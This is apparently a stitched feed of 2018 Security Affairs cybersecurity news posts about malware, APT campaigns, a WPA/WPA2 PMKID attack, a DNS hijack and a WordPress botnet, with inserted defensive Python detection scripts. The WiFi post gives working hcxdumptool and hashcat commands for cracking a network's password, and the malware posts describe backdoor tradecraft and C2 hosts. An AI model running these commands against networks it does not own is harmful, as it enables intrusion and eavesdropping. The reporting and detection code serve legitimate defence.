The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continues to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks: when, where and how exactly your data was compromised”.

The regularly updated Group-IB Threat Intelligence system provides actionable information about data leaks, compromised accounts, malware, infected IPs and existing vulnerabilities across the world. These unique indicators allow organizations to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents, CERT-GIB experts contacted official CERTs in more than 30 countries and notified local incident response teams about the data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application that supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii application that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, which appears to be a version of Adobe Zii, most likely so that the application appears harmless.

The Python script looks for the presence of Little Snitch, a commonly used outgoing firewall, and halts the infection process if it is present.

Then the script opens a connection to an EmPyre backend that sends arbitrary commands to the compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 
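The persistence described above is a launch agent whose ProgramArguments start an interpreter with an obfuscated inline script. The following added example (not Malwarebytes' code) audits a LaunchAgents directory with the standard-library plistlib for that pattern and for the label named in the analysis; the two plists it writes to a temporary directory are constructed for the demo and the base64 payload is a harmless stand-in, not the real script.

```python
import base64
import os
import plistlib
import re
import tempfile

# Launch agent label reported in the Malwarebytes analysis (from the page).
KNOWN_BAD_LABELS = {"com.proxy.initialize"}

# Interpreters a legitimate launch agent rarely needs to start with an inline script.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "sh", "bash", "zsh"}
INLINE_FLAGS = {"-c", "-e"}


def looks_obfuscated(text: str) -> bool:
    """Heuristic: decode/exec keywords, or a long base64-like run, in the command line."""
    if re.search(r"\b(exec|eval|base64|b64decode|zlib)\b", text):
        return True
    return re.search(r"[A-Za-z0-9+/=]{80,}", text) is not None


def inspect_agent(plist_bytes: bytes) -> list:
    """Return a list of findings for one plist (an empty list means nothing suspicious)."""
    findings = []
    try:
        agent = plistlib.loads(plist_bytes)
    except ValueError:  # plistlib.InvalidFileException is a ValueError
        return ["unparsable plist"]
    label = str(agent.get("Label", ""))
    if label in KNOWN_BAD_LABELS:
        findings.append("label %r matches a reported IoC" % label)
    args = agent.get("ProgramArguments") or []
    if isinstance(args, list) and args:
        prog = os.path.basename(str(args[0]))
        inline = INLINE_FLAGS.intersection(str(a) for a in args[1:])
        if prog in INTERPRETERS and inline:
            findings.append("%s started with an inline script (%s)" % (prog, ", ".join(sorted(inline))))
        if looks_obfuscated(" ".join(str(a) for a in args)):
            findings.append("ProgramArguments contain encoded or self-decoding script content")
    if findings and agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: restarted by launchd whenever it exits")
    return findings


def audit_directory(path: str) -> dict:
    """Map each suspicious .plist file name under `path` to its findings."""
    results = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            findings = inspect_agent(fh.read())
        if findings:
            results[name] = findings
    return results


def build_demo_dir() -> str:
    """Write two constructed plists to a temp dir: one mimicking the backdoor agent, one benign."""
    d = tempfile.mkdtemp()
    # Constructed stand-in for the obfuscated script; not the real payload.
    payload = base64.b64encode(b"print('constructed stand-in for the backdoor script')\n" * 3).decode()
    bad = {
        "Label": "com.proxy.initialize",
        "RunAtLoad": True,
        "KeepAlive": True,
        "ProgramArguments": ["/usr/bin/python", "-c",
                             "import base64;exec(base64.b64decode('%s'))" % payload],
    }
    good = {
        "Label": "com.example.backup",
        "RunAtLoad": True,
        "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
    }
    for fname, agent in (("com.proxy.initialize.plist", bad), ("com.example.backup.plist", good)):
        with open(os.path.join(d, fname), "wb") as fh:
            plistlib.dump(agent, fh)
    return d


if __name__ == "__main__":
    for fname, findings in audit_directory(build_demo_dir()).items():
        print(fname)
        for f in findings:
            print("  -", f)
```

On a real system, point `audit_directory` at `~/Library/LaunchAgents` and `/Library/LaunchAgents`; the label match is only one of several checks, since the page notes the malware is built from open-source tools that can be relabelled.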

The analysis of the code revealed another interesting feature: code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis.

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.

Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.

Cohan was arrested on August 31 by the U.K. National Crime Agency (NCA). The teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and to a United Airlines flight traveling from the UK to San Francisco in August, in many cases resulting in evacuations.

The NCA says the teenager has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” said Judge Richard Foster, quoted by the Daily Mail.

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.

Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.


Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below is the attack, step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Run the hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

In this way it is possible to retrieve the password of the target WiFi network.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube concludes.

“The main advantages of this attack are as follows:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.

Hackers defaced Linux.org with DNS hijack

The Linux.org website was defaced last week via a DNS hijack: the attackers broke into the associated registrar account and changed the domain’s DNS settings.

The attackers changed the defacement page a few times; they protested against the new Linux kernel developer code of conduct in a regrettable way, with racial slurs and the image of an individual showing the anus.


The defacement page also includes links and a Twitter account (@kitlol5) believed to be under the control of the attacker.

The person who was operating the Twitter account posted a screenshot showing that they had access to the Network Solutions account of Michelle McLagan, who evidently owns linux.org, and modified the DNS settings.

“This evening someone got into my partner’s netsol account and pointed linux.org DNS to their own cloudflare account. The production env (web / db) wasn’t touched. DNS was simply pointing to another box,” one of the Linux.org admins wrote on Reddit.

“She’s working with netsol to prove ownership, etc.. and we’re hoping things will be cleared up in the morning.”

The hacker did not access the servers hosting Linux.org, and user data was not compromised.

How to prevent this kind of incident?

Administrators should enable multi-factor authentication (MFA) on their registrar and DNS accounts.

“I think it was a combination of public whois info and no MFA that led to this,” added the Linux.org admin.

“There’s always one thing – they found the weakest link and exploited it.”

After the incident, admins have enabled MFA on all accounts.

Pierluigi Paganini

(Security Affairs – DNS hijack, hacking)

The post Hackers defaced Linux.org with DNS hijack appeared first on Security Affairs.

WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a botnet of 20,000 WordPress sites infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them into the botnet.

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by the attackers to carry out brute force attacks against other WordPress sites. According to the Wordfence Defiant Threat Intelligence team, the botnet has already generated over 5 million authentication requests. The bots attempt XML-RPC authentication against other WordPress sites in order to gain access to privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site using the WordPress apps or other API clients; it is exposed by the xmlrpc.php file in the root directory of a WordPress install.

Unfortunately, the XML-RPC interface does not rate-limit the number of authentication attempts that can be submitted, a gift for brute-force attackers.

A close look at the malicious infrastructure allowed the experts to discover that the hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service. The experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised, it starts carrying out brute force attacks against the XML-RPC interface of other websites.

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

The brute force scripts used by the attackers accept POST input from the C2 servers; each request includes the domains to target and the word lists to use when performing the brute force attacks.

It is also possible to supply new wordlists by providing a URL to the script.
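As an added example (not code from the Wordfence report), the following Python script applies the observation above to ordinary web-server access logs: it counts POSTs to xmlrpc.php per source inside a sliding window and flags sources that present the wp-iphone/wp-android User-Agents at a rate no real mobile app would produce. The log lines are constructed, and the window and threshold are assumptions to tune per site.

```python
"""Flag likely XML-RPC brute-force sources in combined-format access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# User-Agents of the official mobile apps, which the botnet imitated.
MOBILE_APP_UA = re.compile(r"^wp-(iphone|android)", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_xmlrpc_bruteforce(lines, window=timedelta(seconds=60), threshold=10,
                           require_app_ua=True):
    """Return {ip: peak_count} for sources whose POSTs to xmlrpc.php exceed
    `threshold` inside any `window`. The HTTP status is deliberately ignored:
    WordPress answers a failed XML-RPC login with HTTP 200 and an XML-RPC fault,
    so volume and User-Agent are the usable signals in plain access logs."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].startswith("/xmlrpc.php"):
            continue
        if require_app_ua and not MOBILE_APP_UA.match(rec["ua"]):
            continue
        per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, second, ua, method="POST", path="/xmlrpc.php"):
    """Build one constructed log line (sample data, not from the report)."""
    return (f'{ip} - - [06/Dec/2018:10:00:{second:02d} +0000] "{method} {path} HTTP/1.1" '
            f'200 412 "-" "{ua}"')


# Constructed sample: one bot hammering xmlrpc.php, one genuine app user, one browser hit.
SAMPLE_LOG = (
    [_line("203.0.113.10", s, "wp-iphone/10.5") for s in range(0, 36, 3)]   # 12 POSTs in 33 s
    + [_line("198.51.100.7", s, "wp-android/10.1") for s in (5, 40)]        # 2 POSTs, normal use
    + [_line("192.0.2.5", 7, "Mozilla/5.0", method="GET", path="/wp-login.php")]
)

if __name__ == "__main__":
    for ip, count in find_xmlrpc_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} XML-RPC POSTs with mobile-app UA inside 60 s")
```

Because the attacking sources are themselves compromised WordPress sites, a hit is a reason to rate-limit or challenge xmlrpc.php (or disable it where the apps are not used) rather than to assume the owner of the source IP is hostile.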

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs – WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.

STOLEN PENCIL campaign, hackers target academic institutions

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website that displays a decoy document and attempts to trick users into installing a malicious Google Chrome extension.
Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities and had expertise in biomedical engineering.

The attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (e.g. Korean keyboard layouts, web browsers open in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

The threat actors used many basic phishing pages; the more sophisticated ones, aimed at academia, displayed a benign PDF in an IFRAME and redirected users to a “Font Manager” extension in the Chrome Web Store.

The malicious extension loads JavaScript from a separate site; the experts only found a file containing legitimate jQuery code there, likely because the threat actors had replaced the malicious code to hinder analysis. The extension is able to read data from all the websites accessed by the victim, which suggests the attackers were looking to steal browser cookies and passwords.

The experts pointed out that the attackers did not use malware to compromise the targets; the STOLEN PENCIL attackers employed RDP to access the compromised systems, and the researchers observed remote access occurring daily from 06:00 to 09:00 UTC (01:00-04:00 EST).

The STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces an Ethereum wallet address with the attackers’ own; the latter adds a Windows administrator account to the system and also enables RDP.

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The list of tools includes KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small part of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the aforementioned cryptojacker, and the Korean language suggests the actor is of North Korean origin, the security researchers say.

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land. ” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft.  Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.

Europol identified 1504 money mules under EMMA 4 operation

Europol announced the arrest of 168 people under the European Money Mule Action ‘EMMA 4’, a massive operation that resulted in the identification of 1,504 money mules.

Europol announced that 168 people have been arrested under ‘EMMA 4’, an international operation conducted by law enforcement that ran from September to November 2018. Law enforcement agencies in 30 countries identified 140 money mule organizers.

Europol opened 837 criminal investigations, many of which are still ongoing, and law enforcement made arrests in 20 countries.
The operation saw the participation of Europol, Eurojust, the European Banking Federation, and law enforcement from Austria, Belgium, Bulgaria, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Greece, Germany, Hungary, Ireland, Italy, Latvia, Lithuania, Malta, Netherlands, Poland, Portugal, Romania, Slovenia, Spain, Sweden, Australia, Moldova, Norway, Switzerland, the United Kingdom and the United States.

The operation aimed at dismantling money laundering activities, in particular tackling the ‘money mule’ rings that play a crucial role in the criminal activity. Global and European banks provided essential support to EMMA 4: Europol reported the participation of over 300 banks, 20 bank associations, and other financial institutions. The financial organizations helped report 26,376 fraudulent money mule transactions, preventing a total loss of €36.1 million ($41.1 million).

Money mules are essential for cashing out the proceeds of criminal activities: they transfer stolen funds between accounts to launder the money.

“Money mules are individuals who, often unwittingly, have been recruited by criminal organisations as money laundering agents to hide the origin of ill-gotten money.” reads the press release published by Europol.

“Tricked by the promise of easy money, mules transfer stolen funds between accounts, often in different States, on behalf of others and are usually offered a share of the funds that pass through their own accounts.”

Criminal organizations typically choose money mules among newcomers to a country or people who are unemployed or in economic distress. Unfortunately, the number of young people recruited as money mules is increasing; criminals reach them through social media, fake job advertisements or get-rich-quick posts.

Young people often do not perceive that transferring funds from one account to another on behalf of others is a crime.

“To raise awareness of this type of fraud, the money muling awareness campaign #DontBeAMule kicks off today across Europe. With awareness-raising material, available for download in 25 languages, the campaign will inform the public about how these criminals operate, how they can protect themselves and what to do if they become a victim.” concludes the press release.

“For the next week, international partners from law enforcement and judicial authorities, together with financial institutions, will be supporting the campaign at national level.”

Pierluigi Paganini

(Security Affairs – money mules, EMMA 4)

The post Europol identified 1504 money mules under EMMA 4 operation appeared first on Security Affairs.

Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater infection chain observed in a recent wave of cyber attacks.

Introduction

At the end of November, several Middle East countries were targeted by a new wave of attacks attributed to the Iranian APT group known as “MuddyWater”: their first campaign was observed back in 2017, and more recently Unit42 researchers reported attacks in the ME area. MuddyWater’s TTPs appear to have remained largely unchanged over this period: the group keeps using spear-phishing emails carrying a blurred document to induce the target to enable the execution of VBA macro code, which infects the host with the POWERSTATS malware.

Figure 1. Malicious document

According to the analysis of the ClearSky Research Team and TrendMicro researchers, at the end of November the MuddyWater group hit Lebanese and Omani institutions and, a few days later, Turkish entities. The attack vector and the final payload were the same: the usual macro-embedded document and the POWERSTATS backdoor, respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables macro execution, the malicious code creates an Excel document containing the code needed to download the next stage of the malicious implant. At the same time, it shows a fake error popup saying that the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed in the new Excel document downloads PowerShell code from a URL apparently referencing a PNG image file, “http://pazazta[.]com/app/icon.png”. The downloaded payload creates three new local files:

  • C:\Windows\Temp\temp.jpg, containing JavaScript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.

Figure 5. Downloaded PowerShell code

As shown in the above figure, the first file to be executed is “Windows.vbe”, which simply runs the JavaScript code contained in temp.jpg using the CSCRIPT engine. Once decrypted, the purpose of the JavaScript is clear: delaying the execution of another PowerShell payload.

Figure 6. JavaScript code within “temp.jpg”

In fact, the next malicious stage is executed only when the condition “Math.round(ss) % 20 == 19” is met; otherwise the script keeps re-executing itself. The “ss” variable holds the number of seconds elapsed since 1 January 1970 00:00:00 (the Unix epoch).

The final stage consists of the execution of the POWERSTATS backdoor contained in the “Microsoft.db” file. The backdoor contacts two domain names, “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, both resolving to the same IP address, 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTATS beaconing requests

Once executed, the POWERSTATS malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind of request performed by the malicious implant; during the analysis the following values were observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identifies the victim machine; it is derived from local system information, unlike the sample analyzed by TrendMicro, which uses only the hard drive serial number. This identifier is also used to name a file created in the “C:\ProgramData\” folder to store temporary information.

Figure 9. Victim id creation
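As an added example (not code from the Yoroi analysis), the following Python script hunts for the POWERSTATS request pattern described above in proxy logs: it groups requests by client, destination host and victim `id`, records which `type` values each session exercises, and flags sessions that cover several of them. The log format, the destination host name and the assumption that `type` and `id` travel in the URL query string are constructed for this example.

```python
"""Triage proxy logs for POWERSTATS-style C2 sessions (added example)."""
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Request-type values observed in the analysis of the POWERSTATS C2 protocol.
BEACON_TYPES = {"info", "live", "cmd", "res"}
# (method, type) pairings the analysis describes; anything else is worth a look.
EXPECTED = {("POST", "info"), ("POST", "live"), ("POST", "cmd"), ("GET", "cmd"), ("POST", "res")}


def parse_proxy_line(line):
    """Parse a constructed 'timestamp client method url' proxy record.

    Returns None for lines that do not have exactly those four fields."""
    parts = line.split(None, 3)
    if len(parts) != 4:
        return None
    ts, client, method, url = parts
    u = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(u.query).items()}
    return {"ts": ts, "client": client, "method": method.upper(),
            "host": u.hostname, "path": u.path, "query": query}


def find_powerstats_sessions(lines, min_types=2):
    """Group requests carrying a beacon 'type' and an 'id' by (client, host, id).

    A session is returned when it uses at least `min_types` distinct type values;
    a single benign URL that happens to carry type=info&id=... is thereby ignored,
    while a real implant cycles through info, live, cmd and res."""
    sessions = defaultdict(lambda: {"types": set(), "requests": 0, "unexpected": []})
    for line in lines:
        rec = parse_proxy_line(line)
        if rec is None:
            continue
        q = rec["query"]
        kind = q.get("type")
        if kind not in BEACON_TYPES or "id" not in q:
            continue
        session = sessions[(rec["client"], rec["host"], q["id"])]
        session["types"].add(kind)
        session["requests"] += 1
        if (rec["method"], kind) not in EXPECTED:
            session["unexpected"].append((rec["method"], kind))
    return {key: s for key, s in sessions.items() if len(s["types"]) >= min_types}


# Constructed sample log: one infected host talking to a placeholder C2, plus benign noise.
SAMPLE_PROXY_LOG = [
    "2018-11-28T06:01:00Z 10.0.0.15 POST http://c2.example.invalid/?type=info&id=ab12cd",
    "2018-11-28T06:01:05Z 10.0.0.15 POST http://c2.example.invalid/?type=live&id=ab12cd",
    "2018-11-28T06:01:10Z 10.0.0.15 GET http://c2.example.invalid/?type=cmd&id=ab12cd",
    "2018-11-28T06:01:12Z 10.0.0.15 POST http://c2.example.invalid/?type=cmd&id=ab12cd",
    "2018-11-28T06:01:14Z 10.0.0.15 POST http://c2.example.invalid/?type=res&id=ab12cd",
    "2018-11-28T06:02:00Z 10.0.0.20 GET https://www.example.com/search?type=info&id=42",
    "2018-11-28T06:02:30Z 10.0.0.21 GET https://www.example.com/news?page=2",
]

if __name__ == "__main__":
    for (client, host, victim_id), s in find_powerstats_sessions(SAMPLE_PROXY_LOG).items():
        print(f"{client} -> {host} id={victim_id}: {s['requests']} requests, "
              f"types={sorted(s['types'])}, unexpected={s['unexpected']}")
```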

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor and identify the functionalities supported by the implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64-encoded PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\ProgramData\LSASS” containing a PowerShell script and runs it.

Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities rely on simple, well-known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVersion\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, run every day at 12:00.

Figure 12. Scheduled task installed by the malware

Conclusion

This latest campaign of the Iranian APT group “MuddyWater” is a clear example of how hacking groups can leverage system tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded documents as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13. MuddyWater’s infection chain

Technical details, including indicators of compromise and Yara rules, are reported in the analysis published on the Yoroi blog: https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.



Security Affairs

Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

